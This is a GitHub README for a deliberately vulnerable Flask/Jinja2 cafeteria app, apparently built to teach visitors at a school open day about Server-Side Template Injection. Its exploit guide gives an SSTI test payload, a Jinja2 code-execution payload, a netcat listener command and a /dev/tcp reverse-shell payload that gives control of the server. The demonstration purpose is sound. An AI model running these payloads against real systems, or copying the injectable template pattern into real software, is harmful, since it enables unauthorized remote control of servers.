Skip to content

codestern/Kaindorf-Cafeteria

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
screenshots
screenshots
 
 
src
src
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Kaindorf Cafeteria

Disclaimer

This project is intended for educational purposes only.
Its purpose is to raise awareness about web vulnerabilities, specifically Server-Side Template Injection (SSTI).
Any misuse of this information for unauthorized or malicious activities is strictly prohibited. Always ensure you have permission before testing any application for vulnerabilities.

Introduction

The purpose of this project is to inform visitors at the TdoT@HTBLA Kaindorf about the following web vulnerability: SSTI (Server-Side Template Injection).

Setup of the Project

To launch this project, you need to install the required dependencies. This can easily be done using the included requirements.txt file:

pip install -r requirements.txt

(Of course, it is recommended to use a virtual environment for this process.)

Once the dependencies are installed, you can run the application by either executing the app.py file:

python src/app.py

or by using Flask directly:

flask --app src/app.py run

After running one of these commands, your application should start on an appropriate port!

Home Page

How to Exploit

Since this app is designed to demonstrate a vulnerability, here is a quick guide on how to launch a reverse shell on the running server.

As mentioned earlier, the primary vulnerability of this app is SSTI (Server-Side Template Injection). Since the app uses Jinja2 as its template engine, a basic payload to test the vulnerability would be:

{{7*7}}

SSTI Test

In this example, the payload results in the executed calculation (49), which confirms that our SSTI is working.

Deploying a Reverse Shell

The next step is to deploy a reverse shell. Since this is a common exploit, many payloads are already available. We will use the basis provided by PayloadsAllTheThings.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

However, instead of running the id command, we will deploy a reverse shell. Before adjusting the payload, you need to listen on a specific port on your machine using the following command:

nc -lvnp 1337

Now, adjust the payload to look like this:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('sh -i >& /dev/tcp/IP/1337 0>&1').read() }}

(Instead of "IP" use your listener IP)

After sending this to the website, your shell should receive a listener, giving you control over the server.

About

A little Flask (+ Jinja2) application to demonstrate the risk of SSTI

Topics

flask security jinja2 hacking ssti

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages